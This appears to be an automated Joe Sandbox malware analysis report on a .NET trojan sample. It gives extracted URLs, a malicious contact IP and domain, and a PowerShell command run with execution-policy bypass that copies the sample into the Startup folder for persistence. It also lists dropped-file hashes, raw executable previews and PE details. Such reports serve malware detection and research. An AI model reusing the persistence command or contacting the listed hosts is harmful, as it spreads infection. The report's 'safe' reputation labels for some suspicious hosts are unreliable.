                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000003.262043012.00000000076F3000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.268161623.0000000004674000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.379255389.0000000007E33000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.372155180.0000000004DC3000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haNKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000003.262043012.00000000076F3000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.268161623.0000000004674000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.379255389.0000000007E33000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.372155180.0000000004DC3000.00000004.00000001.sdmpfalse
                            		high
                            http://crl.microsoft.copowershell.exe, 00000002.00000002.277720910.00000000076B0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://pNaYvIZ26OfWPs.netNKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://nobettwo.xyzNKPhba0VZI.exe, 00000005.00000002.478647044.0000000002F04000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.272085164.0000000005593000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://oVNzXy.comDrivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.ipify.org%GETMozilla/5.0Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		low
                              http://blog.naver.com/cubemit314Ghttp://projectofsonagi.tistory.com/NKPhba0VZI.exe, 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, Drivers.exe, 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.267966815.0000000004531000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.371748819.0000000004C81000.00000004.00000001.sdmpfalse
                                  		high
                                  https://api.ipify.org%NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		low
                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipNKPhba0VZI.exe, 00000001.00000003.199780118.0000000001408000.00000004.00000001.sdmp, NKPhba0VZI.exe, 00000005.00000002.463182723.0000000000402000.00000040.00000001.sdmp, Drivers.exe, 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, Drivers.exe, 00000014.00000002.463217997.0000000000402000.00000040.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000003.262043012.00000000076F3000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.268161623.0000000004674000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.379255389.0000000007E33000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.372155180.0000000004DC3000.00000004.00000001.sdmpfalse
                                    		high

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    198.54.126.101
                                    		unknownUnited States
                                    		22612NAMECHEAP-NETUStrue

                                    General Information

                                    Joe Sandbox Version:31.0.0 Emerald
                                    Analysis ID:358333
                                    Start date:25.02.2021
                                    Start time:12:24:29
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 11m 59s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:NKPhba0VZI.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:30
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.adwa.spyw.evad.winEXE@12/12@2/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                    • Quality average: 58.1%
                                    • Quality standard deviation: 31.9%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                    • Excluded IPs from analysis (whitelisted): 104.43.193.48, 23.211.6.115, 104.42.151.234, 168.61.161.212, 13.107.42.23, 13.107.5.88, 23.218.208.56, 51.11.168.160, 8.253.204.120, 67.27.158.126, 8.248.145.254, 8.248.119.254, 67.27.159.126, 20.54.26.129, 92.122.213.194, 92.122.213.247, 51.104.139.180
                                    • Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, arc.msn.com.nsatc.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, l-0014.config.skype.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, au-bg-shim.trafficmanager.net, afdo-tas-offload.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, l-0014.l-msedge.net, skypedataprdcolwus16.cloudapp.net
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/358333/sample/NKPhba0VZI.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    12:25:37API Interceptor710x Sleep call for process: NKPhba0VZI.exe modified
                                    12:25:41API Interceptor64x Sleep call for process: powershell.exe modified
                                    12:25:45AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                    12:26:13API Interceptor478x Sleep call for process: Drivers.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    198.54.126.101http://tycoontribe.com/oned/sharepoint-v9/index.phpGet hashmaliciousBrowse
                                    • tycoontribe.com/wp-content/uploads/2019/09/TTbackgnd.jpg

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    nobettwo.xyzRF_IMG_7510.docGet hashmaliciousBrowse
                                    • 198.54.126.101

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    NAMECHEAP-NETUSRF_IMG_7510.docGet hashmaliciousBrowse
                                    • 198.54.126.101
                                    PDA BGX00001A DA Query Notification BGX009RE09000001A.xlsxGet hashmaliciousBrowse
                                    • 198.54.121.237
                                    Shipping_Documet.xlsxGet hashmaliciousBrowse
                                    • 198.54.112.233
                                    QUOTATION.xlsxGet hashmaliciousBrowse
                                    • 198.54.121.237
                                    QUOTATION.xlsxGet hashmaliciousBrowse
                                    • 198.54.121.237
                                    OFFER.exeGet hashmaliciousBrowse
                                    • 198.54.122.60
                                    RPQ_1037910.exeGet hashmaliciousBrowse
                                    • 162.213.253.52
                                    KQ8FEB2021.exeGet hashmaliciousBrowse
                                    • 162.213.253.54
                                    y1dGqCeJXQ.exeGet hashmaliciousBrowse
                                    • 162.213.253.54
                                    Scan #84462.xlsmGet hashmaliciousBrowse
                                    • 63.250.38.58
                                    Invoice_#_6774.xlsmGet hashmaliciousBrowse
                                    • 63.250.38.58
                                    Invoice_#_6774.xlsmGet hashmaliciousBrowse
                                    • 63.250.38.58
                                    Notice 698.xlsmGet hashmaliciousBrowse
                                    • 63.250.38.58
                                    7ufnEJRkxE.exeGet hashmaliciousBrowse
                                    • 199.193.7.228
                                    pHmpCUO2W2.exeGet hashmaliciousBrowse
                                    • 199.193.7.228
                                    Price quotation.exeGet hashmaliciousBrowse
                                    • 198.54.125.81
                                    267700.xlsxGet hashmaliciousBrowse
                                    • 198.54.121.237
                                    267700.xlsxGet hashmaliciousBrowse
                                    • 198.54.121.237
                                    shipping document.docGet hashmaliciousBrowse
                                    • 199.193.7.228
                                    SecuriteInfo.com.W32.MSIL_Kryptik.COP.genEldorado.31763.exeGet hashmaliciousBrowse
                                    • 198.54.122.60

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeRF_IMG_7510.docGet hashmaliciousBrowse

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Drivers.exe.log
                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):706
                                      Entropy (8bit):5.342604339328228
                                      Encrypted:false
                                      SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21q1KDLI4M9XKbbDLI4MWuPJKiUrRZ9I0ZKm:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9px
                                      MD5:3A72FBECA73A61C00EECBDEC37EAD411
                                      SHA1:E2330F7B3182A857BB477B2492DDECC2A8488211
                                      SHA-256:2D4310C4AB9ADEFD6169137CD8973D23D779EDD968B8B39DBC072BF888D0802C
                                      SHA-512:260EBFB3045513A0BA14751A6B67C95CDA83DD122DC8510EF89C9C42C19F076C8C40645E0795C15ADDF57DB65513DD73EB3C5D0C883C6FB1C34165BE35AE3889
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NKPhba0VZI.exe.log
                                      Process:C:\Users\user\Desktop\NKPhba0VZI.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):706
                                      Entropy (8bit):5.342604339328228
                                      Encrypted:false
                                      SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21q1KDLI4M9XKbbDLI4MWuPJKiUrRZ9I0ZKm:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9px
                                      MD5:3A72FBECA73A61C00EECBDEC37EAD411
                                      SHA1:E2330F7B3182A857BB477B2492DDECC2A8488211
                                      SHA-256:2D4310C4AB9ADEFD6169137CD8973D23D779EDD968B8B39DBC072BF888D0802C
                                      SHA-512:260EBFB3045513A0BA14751A6B67C95CDA83DD122DC8510EF89C9C42C19F076C8C40645E0795C15ADDF57DB65513DD73EB3C5D0C883C6FB1C34165BE35AE3889
                                      Malicious:true
                                      Reputation:moderate, very likely benign file
                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):19604
                                      Entropy (8bit):5.5732578371132115
                                      Encrypted:false
                                      SSDEEP:384:9typXbq0FfVeOy0MSg5l4KnLul9tHdpaeQ99gtCcQQpPTDkiqWJI5jQ:kfVaZSgX4KLul7H3at80RAozWJt
                                      MD5:E47E850408CFEC13093B384E274EA249
                                      SHA1:ABD257A58EB6B5E6D9A1B4BA816DF75CFA852CCD
                                      SHA-256:45B758B05B461164070A22FC3531EC92EB40C66C1B58A02875C56F1C9043A4D8
                                      SHA-512:CCD37B07333AFE93E6642A366B82C7EA6FD320F0778D41B73C7E5D4737EFAC57452461C813B51041EE1EC3A90B796A50AE7412D5E825BFDE1B5FAA1D4A2B1BC0
                                      Malicious:false
                                      Reputation:low
                                      Preview: @...e.......................F.6.6.....n.>............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)P.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<.................~.[L.D.Z.>..m.........System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bnmp4ebp.syx.ps1
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview: 1
                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1rqppmh.xce.psm1
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview: 1
                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5urz4n2.cbm.ps1
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview: 1
                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwlodmhm.as4.psm1
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview: 1
                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):620032
                                      Entropy (8bit):7.223416647299071
                                      Encrypted:false
                                      SSDEEP:12288:fFQMGhfwkDj84te4xzFZF49OR7tQt4mcl:fFpGhfwO84teOV49OR7tQte
                                      MD5:3A89CF2D6D2449EF1A9640AF29F3A782
                                      SHA1:220B9C5B4C7E9DE15753F629DA1AC3A075DC0800
                                      SHA-256:3D652EB897291F8EB2FE8F9374007388B0CD426A797DE77545B82A325DDE762A
                                      SHA-512:8B016C645C5CC5874F9FBD9539846CC74A07BA33DB75E11D0FD80EEEC8D0DCAE081B7B4A4090B5F806A2CE38BD8EACA859E15962441C691FD42995AE7FF9F974
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 26%
                                      Joe Sandbox View:
                                      • Filename: RF_IMG_7510.doc, Detection: malicious, Browse
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J7`..............0.................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc...............t..............@..B........................H.......t................-..Vf..........................................6.~....(#...&*6.r...p(?...&*..*....oe...}......of...}......}....*.(....r...p(.........~....~....op...oq..........*B.(r......(.....*.(}........*".(.....*&.(r.....*".......*".(.....*Vs....(....t..... ...*...0............}.....(.......(......{....r...po......{.....o.......}.....s....}......(....r...p(....}.....{....(....&..{....(.....i}.....(.....*..0..c.........{.........,f...s....}.....{.....o.......}.....
                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe:Zone.Identifier
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview: [ZoneTransfer]....ZoneId=0
                                      C:\Users\user\Documents\20210225\PowerShell_transcript.376483.hZkrHILO.20210225122601.txt
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):3909
                                      Entropy (8bit):5.3554317034757455
                                      Encrypted:false
                                      SSDEEP:96:BZohxN1GcqDo1Z0G9ZhnhxN1GcqDo1Z3V5xazDazDWzFZZ:v
                                      MD5:75CF527A9A62A1535AF090EAB85D3B13
                                      SHA1:A28F4E2601C912DB36BC61D191B97D09C2DCD932
                                      SHA-256:B3E6EB4BA0FB020B015CD20C39ABEA0575DD71EEB4CA619D7E4D4ADE3F5B4771
                                      SHA-512:73D305A077B265147B2D129D2A821F3E866126CCAD96EB36B81DE1B4DCE7929FB3F1B717EFBD3D589CA1BE497CE11F98467AB802FBDB172642C4B5DD5125D7B1
                                      Malicious:false
                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225122618..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 376483 (Microsoft Windows NT 10.0.17134.0)..Host Application: Powershell.exe -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'..Process ID: 6716..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225122618..**********************..PS>Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roam
                                      C:\Users\user\Documents\20210225\PowerShell_transcript.376483.uDG1lXLj.20210225122519.txt
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1175
                                      Entropy (8bit):5.240245547006109
                                      Encrypted:false
                                      SSDEEP:24:BxSAAyxvBnxx2DOXCg8GHuVM5fWStHjeTKKjX4CIym1ZJX0GHuVM5jnxSAZp:BZNvhxoOpuA+StqDYB1ZTuAjZZp
                                      MD5:46A2861BB28560404EB6E971178C990C
                                      SHA1:483341174306970C6E5AEB9BE69DC3913C0DE0FA
                                      SHA-256:E8C880B7ED410EE403654BFB489D5134666E03626B97473D27131427473B97F1
                                      SHA-512:F7A4148FE9EBC2AB6A2DC31DEC2B53EDBDA84BEAD745648FDC16B33B38CD2845A0C1DF42741A52B2DADCF7E8148A50CE4AF6E0F4FA70322B4226362B54D5034F
                                      Malicious:false
                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225122534..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 376483 (Microsoft Windows NT 10.0.17134.0)..Host Application: Powershell.exe -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'..Process ID: 2576..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225122534..**********************..PS>Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'..**********************..Command start

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.223416647299071
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:NKPhba0VZI.exe
                                      File size:620032
                                      MD5:3a89cf2d6d2449ef1a9640af29f3a782
                                      SHA1:220b9c5b4c7e9de15753f629da1ac3a075dc0800
                                      SHA256:3d652eb897291f8eb2fe8f9374007388b0cd426a797de77545b82a325dde762a
                                      SHA512:8b016c645c5cc5874f9fbd9539846cc74a07ba33db75e11d0fd80eeec8d0dcae081b7b4a4090b5f806a2ce38bd8eaca859e15962441c691fd42995ae7ff9f974
                                      SSDEEP:12288:fFQMGhfwkDj84te4xzFZF49OR7tQt4mcl:fFpGhfwO84teOV49OR7tQte
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J7`..............0.................. ........@.. ....................................@................................

                                      File Icon

                                      Icon Hash:b464e4d0f0e8cc60

                                      Static PE Info

                                      General

                                      Entrypoint:0x46b29e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x60374AFD [Thu Feb 25 07:00:13 2021 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:v4.0.30319
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
